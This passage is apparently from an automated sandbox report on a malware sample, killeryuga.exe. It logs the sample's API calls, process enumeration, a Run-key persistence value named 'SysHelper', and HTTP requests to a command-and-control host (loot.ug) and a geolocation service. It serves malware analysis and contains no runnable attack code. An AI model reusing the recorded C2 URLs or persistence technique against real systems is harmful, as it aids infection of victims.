Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x753e4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x753dcd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x753e424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x753e46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x753f6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x753e4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x753f65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x753e47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x753e47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x753e47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x7537eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75461544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75461408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7546152c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x75eb5708 True 44
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create LPCWSTRszTitle class_name = LPCWSTRszWindowClass, wndproc_parameter = 0 True 1
Fn
System (418)
»
Operation Additional Information Success Count Logfile
Sleep duration = 1 milliseconds (0.001 seconds) True 161
Fn
Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Get Time type = System Time, time = 2019-03-24 05:38:48 (UTC) True 1
Fn
Get Time type = Ticks, time = 84412 True 1
Fn
Get Time type = Performance Ctr, time = 12804540292 True 1
Fn
Get Time type = System Time, time = 2019-03-24 05:38:51 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 13229078529 True 1
Fn
Get Info type = Hardware Information True 249
Fn
Get Info type = Operating System True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Network Behavior
HTTP Sessions (2)
»
Information Value
Total Data Sent 636 bytes
Total Data Received 7.60 KB
Contacted Host Count 2
Contacted Hosts 77.123.139.189, 95.213.139.118
HTTP Session #1
»
Information Value
User Agent Microsoft Internet Explorer
Server Name loot.ug
Server Port 80
Username -
Password -
Data Sent 169 bytes
Data Received 285 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = loot.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://loot.ug/Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php?pid=AE2BD2A0D8075FA76A58D68C2A4634E3 True 1
Fn
Read Response size = 1024, size_out = 103 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #2
»
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.32 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 554 True 1
Fn
Data
Close Session - True 1
Fn
Process #18: killeryuga.exe
1671 2
»
Information Value
ID #18
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --ForNetRes "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt IsAutoStart IsNotTask
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:10, Reason: Child Process
Unmonitor End Time: 00:03:41, Reason: Self Terminated
Monitor Duration 00:00:30
OS Process Information
»
Information Value
PID 0x588
Parent PID 0x780 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 554
0x 380
0x 300
0x 348
0x 140
0x 268
0x 30C
0x 308
0x 7A8
0x 7AC
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
...
buffer 0x009543E8 0x0098374E Marked Executable - 32-bit - False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040D690, 0x004103C0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00421FDE False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041A448 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00410695 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004425A0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043BFE0 False
...
killeryuga.exe 0x00400000 0x007CCFFF Process Termination - 32-bit - False
...
Host Behavior
File (6)
»
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Registry (2)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Process (460)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe os_pid = 0x7a0, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Enumerate Processes - - True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\sppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\userinit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\java\magnificent.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = SYNCHRONIZE True 5
Fn
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = SYNCHRONIZE True 4
Fn
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = SYNCHRONIZE True 33
Fn
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = SYNCHRONIZE True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = SYNCHRONIZE True 4
Fn
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = SYNCHRONIZE True 383
Fn
Module (466)
»
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x75350000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76f50000 True 2
Fn
Load GDI32.dll base_address = 0x76a80000 True 1
Fn
Load ole32.dll base_address = 0x75bd0000 True 2
Fn
Load SHELL32.dll base_address = 0x75e30000 True 2
Fn
Load USER32.dll base_address = 0x75470000 True 2
Fn
Load kernel32.dll base_address = 0x75350000 True 2
Fn
Load RPCRT4.dll base_address = 0x759b0000 True 1
Fn
Load MPR.dll base_address = 0x750d0000 True 1
Fn
Load WININET.dll base_address = 0x75d30000 True 1
Fn
Load WINMM.dll base_address = 0x75090000 True 1
Fn
Load SHLWAPI.dll base_address = 0x77020000 True 1
Fn
Load KERNEL32.dll base_address = 0x75350000 True 1
Fn
Load OLEAUT32.dll base_address = 0x76b50000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x750f0000 True 1
Fn
Load WS2_32.dll base_address = 0x76b10000 True 1
Fn
Load DNSAPI.dll base_address = 0x75020000 True 1
Fn
Load CRYPT32.dll base_address = 0x751a0000 True 1
Fn
Load msvcr100.dll base_address = 0x74e80000 True 1
Fn
Load Psapi.dll base_address = 0x75460000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75350000 True 15
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 1024 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringA, address_out = 0x75363c5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x7536465a True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x7536469b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x75361410 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x753653c6 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x75363c42 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x75363bca True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesA, address_out = 0x7538287b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x7537d5e5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x75363da5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatA, address_out = 0x7538a959 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatA, address_out = 0x7538a842 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x75361946 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeA, address_out = 0x75388266 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFileEx, address_out = 0x753e45ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x753e4691 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FillConsoleOutputAttribute, address_out = 0x754071e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75361245 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetCommMask, address_out = 0x753e7198 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TransmitCommChar, address_out = 0x753e75fe True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = PrepareTape, address_out = 0x753ed232 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x75361222 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75361700 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVolumePathNameA, address_out = 0x753ebeed True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsBadWritePtr, address_out = 0x7538d1ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextVolumeMountPointA, address_out = 0x753ec189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x7536588e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnlockFileEx, address_out = 0x7538d594 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x753634b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryExA, address_out = 0x753d9479 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedDecrement, address_out = 0x753613f0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteTapemark, address_out = 0x753ed2d2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeW, address_out = 0x7536418b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetNativeSystemInfo, address_out = 0x753710b5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x7537ce46 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalDeleteAtom, address_out = 0x7537cdad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x753617b9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringA, address_out = 0x7538bc39 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x7536192e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x75387aca True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleOutputCP, address_out = 0x75379b0f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleA, address_out = 0x753612fc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x753e454f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x753649d7 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedExchange, address_out = 0x75361462 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x753634c8 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x75364d40 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x753658a6 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x7538d1c3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x7537d802 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75361809 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x7538772f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75364a5d True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x775fe026 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x753611c0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x753614c9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x753610ff True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x75367a10 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x75361282 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x753651b3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x753614b1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x75364950 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x753651cb True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x753651e3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x75365223 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetHandleCount, address_out = 0x7536cb29 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x75363531 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x75360e00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x776045f5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x753611e0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x753649ad True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x753614fb True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x75363587 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InterlockedIncrement, address_out = 0x75361400 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x753611a9 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x75361450 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x753617ec True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapCreate, address_out = 0x75364a2d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapDestroy, address_out = 0x753635b7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x7536186e True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x75361725 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x7536110c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x753611f8 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x753617d1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x7536170d True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x75407bff True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x75361328 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x775f22b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x775f2270 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x75365189 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x7536179c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x7538d1a1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x75364493 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x75361856 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77611f6e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77603002 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x7536e331 True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = IsValidSecurityDescriptor, address_out = 0x76f5b58c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetFileSecurityA, address_out = 0x76f919b8 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ImpersonateLoggedOnUser, address_out = 0x76f5c57a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ObjectCloseAuditAlarmW, address_out = 0x76f93389 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CreatePrivateObjectSecurity, address_out = 0x76f79a12 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AreAllAccessesGranted, address_out = 0x76f930a8 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetAclInformation, address_out = 0x76f5cc89 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AreAnyAccessesGranted, address_out = 0x76f930b8 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetMetaFileBitsEx, address_out = 0x76aa7121 True 1
Fn
